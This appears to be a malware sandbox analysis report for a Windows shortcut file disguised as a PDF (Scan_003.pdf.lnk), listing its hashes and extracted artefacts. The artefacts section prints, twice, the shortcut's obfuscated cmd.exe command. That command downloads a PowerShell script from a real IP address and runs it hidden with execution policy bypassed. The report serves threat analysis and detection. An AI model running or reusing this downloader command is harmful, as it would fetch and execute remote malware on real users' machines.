Malicious
Malicious
Infection Chain
Summary by MalvaGPT
Characteristics
Hash
 Hash Value
MD5
64bc29705fa0b0c0f2e6cb9295c6f623
Sha1
e7db2117f21116fb3c7526739e5bfd26623c6542
Sha256
250d41a4f0654fb73935b6aff3ea975ec8cbdeb9c1bc127858ec3ec5f6390290
Sha384
559337bf282708d3a72aa5882f8c3befcd54d50f72d706e2f366555f0d29df85286834ce8596da3610ac6d72dc98a00b
Sha512
eb988b28007fabcac03b6533dc035c6d1381f79ae1d9b1cadfa6712310a1d714dfb445a3251b2eda8b3211ca18051560af27ab360a0c14260c61699f049b2cc6
SSDeep
24:8d/Cf3DwdfCXGiXnSpVT6XtBxb1En96pMERrBCU:8lCPkdfYXnSpEtb1U6p9r
TLSH
D1726A8121E80308F2B6FF399A7BAB41093BF990ED71CB6C8E508C5D2954942ED75F66
File Structure
Scan_003.pdf.lnk
Malicious
LNK CommandLine
Malicious
[PowerShell Command]
Malicious
[Deobfuscated PS]
Malicious
[Lnk Summary]
Malicious
[PowerShell Command]
Malicious
[Deobfuscated PS]
Malicious
[Lnk Summary].deobfuscated.vbs
Malicious
Artefacts
Name
 Value
LNK: Command Execution

cmd.exe /v /c "set "a=&" && set "v1=MSXM" && set "v2=L2.XML" && set "o1=ADOD" && set "o2=B.S" && echo Set h=CreateObject("!v1!" ^!a! "!v2!HTTP"):h.open "GET","http://193.169.194.40/S7yhd67/buggypassage.ps1",False:h.setRequestHeader "User-Agent","UA WindowsPowerShell":h.send:Set b=CreateObject("!o1!" ^!a! "!o2!tream"):b.Type=1:b.Open:b.Write h.responseBody:b.SaveToFile "%TEMP%\pzsR.ps1",2 > %TEMP%\gtP.vbs && cscript //b %TEMP%\gtP.vbs && powershell -NoP -W Hidden -ExecutionPolicy Bypass -File %TEMP%\pzsR.ps1 & del %TEMP%\gtP.vbs"
URLs in VB Code - #1

http://193.169.194.40/S7yhd67/buggypassage.ps1
Deobfuscated PowerShell

& Remove-Item "%TEMP%\gtP.vbs"
Deobfuscated PowerShell

& Remove-Item "%TEMP%\gtP.vbs IconLocation: imageres.dll"
Scan_003.pdf.lnk (16.57 KB)
File Structure
Scan_003.pdf.lnk
Malicious
LNK CommandLine
Malicious
[PowerShell Command]
Malicious
[Deobfuscated PS]
Malicious
[Lnk Summary]
Malicious
[PowerShell Command]
Malicious
[Deobfuscated PS]
Malicious
[Lnk Summary].deobfuscated.vbs
Malicious
Characteristics
No malware configuration were found at this point.
Artefacts
Name
 Value Location
LNK: Command Execution

cmd.exe /v /c "set "a=&" && set "v1=MSXM" && set "v2=L2.XML" && set "o1=ADOD" && set "o2=B.S" && echo Set h=CreateObject("!v1!" ^!a! "!v2!HTTP"):h.open "GET","http://193.169.194.40/S7yhd67/buggypassage.ps1",False:h.setRequestHeader "User-Agent","UA WindowsPowerShell":h.send:Set b=CreateObject("!o1!" ^!a! "!o2!tream"):b.Type=1:b.Open:b.Write h.responseBody:b.SaveToFile "%TEMP%\pzsR.ps1",2 > %TEMP%\gtP.vbs && cscript //b %TEMP%\gtP.vbs && powershell -NoP -W Hidden -ExecutionPolicy Bypass -File %TEMP%\pzsR.ps1 & del %TEMP%\gtP.vbs"

Malicious

Scan_003.pdf.lnk
URLs in VB Code - #1

http://193.169.194.40/S7yhd67/buggypassage.ps1

Scan_003.pdf.lnk > [Lnk Summary]
Deobfuscated PowerShell

& Remove-Item "%TEMP%\gtP.vbs"

Malicious

Scan_003.pdf.lnk > LNK CommandLine > [PowerShell Command]
Deobfuscated PowerShell

& Remove-Item "%TEMP%\gtP.vbs IconLocation: imageres.dll"

Malicious

Scan_003.pdf.lnk > [Lnk Summary] > [PowerShell Command]
You must be signed in to post a comment.
An error has occurred. This application may no longer respond until reloaded. Reload 🗙